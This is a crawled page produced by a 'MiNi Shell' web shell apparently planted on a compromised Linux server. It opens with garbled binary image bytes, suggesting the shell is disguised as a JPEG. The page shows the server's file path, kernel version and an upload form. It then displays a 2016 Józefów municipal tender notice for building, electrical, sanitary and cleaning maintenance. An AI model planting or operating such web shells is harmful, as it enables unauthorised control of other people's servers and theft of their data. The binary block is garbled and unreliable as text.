JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/70997-N-2016.html

<p class="kh_header"><b>Józefów: BIEŻĄCA KONSERWACJA W BUDYNKACH KOMUNALNYCH ORAZ W BUDYNKACH POZOSTAJĄCYCH W ZARZĄDZIE MIASTA JÓZEFOWA W OKRESIE OD 01.07.2016 R. DO 31.12.2016 R</b><br>
<b>Numer ogłoszenia: 70997 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Józefów , ul. Kardynała Wyszyńskiego 1, 05-420 Józefów, woj. mazowieckie, tel. 022 7790000, faks 022 7895102.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCA KONSERWACJA W BUDYNKACH KOMUNALNYCH ORAZ W BUDYNKACH POZOSTAJĄCYCH W ZARZĄDZIE MIASTA JÓZEFOWA W OKRESIE OD 01.07.2016 R. DO 31.12.2016 R.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie bieżących prac konserwacyjnych w zakresie robót ogólnobudowlanych, elektrycznych i sanitarnych  oraz prac porządkowych w budynkach komunalnych oraz w częściach wspólnych budynków a także prace na zewnątrz budynków w obrębie nieruchomości komunalnych. Zamawiający podzielił zamówienie na 4 części. CZĘŚĆ 1 - Roboty konserwacji ogólnobudowlanej: 1) naprawa uszkodzeń pokrycia dachowego (usługi blacharsko-dekarskie) łącznie z wymianą uszkodzonych miejsc pokrycia i smołowaniem, naprawa uszkodzeń więźby niewymagających naruszenia pokrycia dachowego oraz naprawa i uzupełnianie tynków kominów ponad dachem i w części strychowej; 2) uzupełnianie opasek betonowych; 3) czyszczenie rynien i rur spustowych, regulacja spadków rynien, mocowanie rynien i rur spustowych;
4) naprawa wykładzin, podłóg drewnianych wraz montażem listew, wymiana uszkodzonych posadzek, uszkodzonych płytek w posadzkach; 5) naprawa lub wymiana stolarki okienne i drzwiowej wraz zaprawianiem, dopasowanie i regulacją; 
6) naprawa kuchni i pieców węglowych wraz z wymianą  oraz wstawianie wyczystek , naprawa drzwiczek rewizyjnych wyciorowych, wymiana rury zapiecowej;
7) naprawa lub wymiana samozamykaczy i klamek; 8) prace: malarskie, tynkarskie, murarskie, izolacyjne, ślusarskie, spawalnicze, szklarskie, naprawy elewacji; naprawa uszkodzonych tynków z pomalowaniem miejsc naprawionych po innych pracach konserwacyjnych; uzupełnianie ubytków ścian z cegieł i desek; 
9) naprawa stopni betonowych i podestów na klatkach schodowych lub przed klatkami schodowymi; 10) naprawa urządzeń na placach zabaw;
11) zabezpieczenie techniczne w przypadku opróżnienia lokalu; 
12) usuwania bieżących skutków awarii powstałych w wyniku warunków pogodowych bądź z przyczyn ludzkich; 13) naprawa lub wymiana ogrodzeń i bram, uzupełnianie pojedynczych elementów;14) naprawa lub wymiana komórek gospodarczych; 15) inne podobne rodzajowo roboty zgodnie ze zgłoszeniem Zamawiającego.
CZĘŚĆ 2 - Roboty konserwacji elektrycznej: 1)	przegląd i wymiana wyłączników p.poż, osprzętu izolacyjnego, styczników, wyłączników różnicowo-nadprądowych, wyłączników prądu przemiennego, bezpieczników, sterowników, podstawy bezpiecznikowe; 2) wyszukiwanie przerw i zwarć w instalacji elektrycznej oraz usuwanie uszkodzeń w instalacji odgromowej budynku bez wymiany poszczególnych elementów; 3) wymiana przewodów instalacji elektrycznych w budynkach- piony klatkowe, wlz, kable zasilające od złącza do rozdzielni głównej; 4) wymiana gniazd bezpiecznikowych, bezpieczników i główek bezpiecznikowych w obwodzie administracyjnym budynku;5) wymiana i uzupełnianie brakujących dekli w puszkach elektrycznych; 6) wymiana osprzętu elektrycznego tj. żarówek, lamp i opraw , wyłączników, przycisków oświetleniowych, gniazd na klatkach schodowych; 
7) naprawy hydroforów; 8) układanie rur i listew montażowych dla instalacji elektrycznej; 9) likwidacja skutków awarii w tym ewentualnych pożarów, przepięć lub uderzeń pioruna; 10) likwidacja nielegalnych poborów energii; 11) naprawa instalacji domofonów, wymiana domofonów i elektrozamków; 12) inne podobne rodzajowo roboty zgodnie ze zgłoszeniem Zamawiającego. CZĘŚĆ 3 - Roboty konserwacji sanitarnej: w budynkach mieszkalnych i w budynkach w zarządzie miasta, w szczególności: 1) naprawa, pogłębianie i wymiana studni Abisynek; 
2) konserwacja i naprawa ujęć wody i hydroforów; 3) czyszczenie i udrażnianie pionów wodno-kanalizacyjnych z wyłączeniem prac zastrzeżonych przepisami do wykonania przez najemców; 4) naprawa lub wymiana instalacji (rur) wod-kan; 
5) likwidacja nieszczelności instalacji wod-kan; likwidacja miejscowych przecieków na instalacji wodnej i kanalizacyjnej łącznie z wymianą poszczególnych elementów, jak również przyborów i urządzeń sanitarnych zainstalowanych w pomieszczeniach wspólnego użytku; 6) czyszczenie i udrażnianie studzienek przy budynkach;
7) naprawy urządzeń gazowych i kotłowni; 8) sprawdzanie szczelności instalacji gazowej wraz likwidacją nieszczelności; 9) usuwanie powstałych awarii instalacji c.o.; 10) dokonywanie wszelkich działań zmierzających do usunięcia awarii w zakresie niezbędnym do ochrony  życia i zdrowia użytkowników nieruchomości jak również zabezpieczenia mienia Zamawiającego; 11) inne podobne rodzajowo roboty zgodnie ze zgłoszeniem Zamawiającego. CZĘŚĆ 4 - Roboty porządkowe: 1) czyszczenie rynien i rur spustowych; 2) sprzątanie nieruchomości, placów zabaw i terenów przyległych; 3) usuwanie śniegu i sopli z dachów; 4) koszenie trawników;
5) usuwanie śniegu i gołoledzi na chodnikach i dojściach do budynku;
6) inne podobne rodzajowo roboty zgodnie ze zgłoszeniem Zamawiającego.
Niniejsze zamówienie jest częścią zamówienia dotyczącego wykonania konserwacji lokali mieszkalnych w 2016 r.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Dopuszcza się możliwość udzielania zamówień uzupełniających  tożsamych z przedmiotem zamówienia podstawowego o wartości nieprzekraczającej 50% wartości zamówienia podstawowego w terminie 3 lat od jego udzielenia. Zamówienia uzupełniające polegać będą na zwiększeniu zakresu robót w okresie realizacji niniejszej umowy  lub udzieleniu nowych zamówień po jej zakończeniu</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wiedzę i doświadczenie umożliwiającą realizację zamówienia tj:
w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył  co najmniej 2 roboty budowlane obejmujące w szczególności roboty: a) część 1 -  ogólnobudowlane  o wartości nie niższej niż 3 000 zł netto każda; b) część 2 - instalacyjne elektryczne o wartości nie niższej niż 3 000 zł netto każda; c) część 3 - instalacyjne sanitarne o wartości nie niższej niż 3 000 zł netto każda; d) część  4- Zamawiający nie określa tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj: a. Część 1 Wskaże do wykonania niniejszego zamówienia na stanowisku Kierownika Robót osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  konstrukcyjno - budowlanej  wydane na podstawie przepisów ustawy z dnia 7 lipca 1994r. Prawo budowlane lub wydane wcześniej odpowiadające im uprawnienia budowlane; b. Część 2  Wskaże do wykonania niniejszego zamówienia na stanowisku Kierownika Robót Elektrycznych osobę posiadającą uprawnienia kwalifikacyjne do 1 kV na stanowisku dozoru (D) i eksploatacji (E) wydane przez uprawnioną komisję; c. Część 3 Wskaże do wykonania niniejszego zamówienia na stanowisku Kierownika Robót Sanitarnych osobę posiadającą uprawnienia kwalifikacyjne do 5 kPa na stanowisku dozoru (D) i eksploatacji (E) wydane przez uprawnioną komisję; d. Część 1 - dysponowanie  minimum dwoma dwuosobowymi brygadami; e. Część 2 - dysponowanie minimum jedną brygadą  dwuosobową w tym dopuszcza się możliwość, aby jedną osobą był Kierownik; f. Część 3 - dysponowanie minimum jedną brygadą  dwuosobową w tym dopuszcza się możliwość, aby jedną osobą był Kierownik; g. Zamawiający dopuszcza możliwość zmiany osób przewidzianych do realizacji umowy w trakcie jej trwania o ile nowe wskazane osoby będą miały uprawnienia nie gorsze niż osoby wskazane w ofercie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia tj/  Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż: 
Część 1 - 150 000,00 zł;
Część 2 - 70 000,00 zł;
Część 3 - 50 000,00 zł.
Wykonawca składający ofertę na dwie lub trzy części zamówienia winien wykazać zdolność ekonomiczną na poziomie  proporcjonalnie wyższym (tj. ubezpieczenie oc w wysokości równej sumie wymaganego ubezpieczenia dla tych części).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga dołączenia dowodów wyłącznie dla robót wymaganych na potwierdzenie spełniania warunku wiedzy i doświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca, który wykazując spełnianie warunków polegać będzie na zasobach innych podmiotów jest zobowiązany przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia  oraz dokumentów  potwierdzających:
a. zakres dostępnych wykonawcy zasobów innego podmiotu;
b. sposób wykorzystania zasobów innego podmioty , przez wykonawcę, przy realizacji zamówienia;
c. charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem;
d. zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. 2) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt III.4.3.1 zastępuje się go dokumentem zawierającym oświadczenie złożonym przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego. 3) Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalna jest jednak pod rygorem nieważności istotna zmiana postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://jozefow.bip.eur.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Józefowa, 05-420 Józefów, ul. Kardynała Wyszyńskiego 1, bud. A, Biuro Obsługi Klienta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2016 godzina 09:30, miejsce: Urząd Miasta Józefowa, 05-420 Józefów, ul. Kardynała Wyszyńskiego 1, bud. A, Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com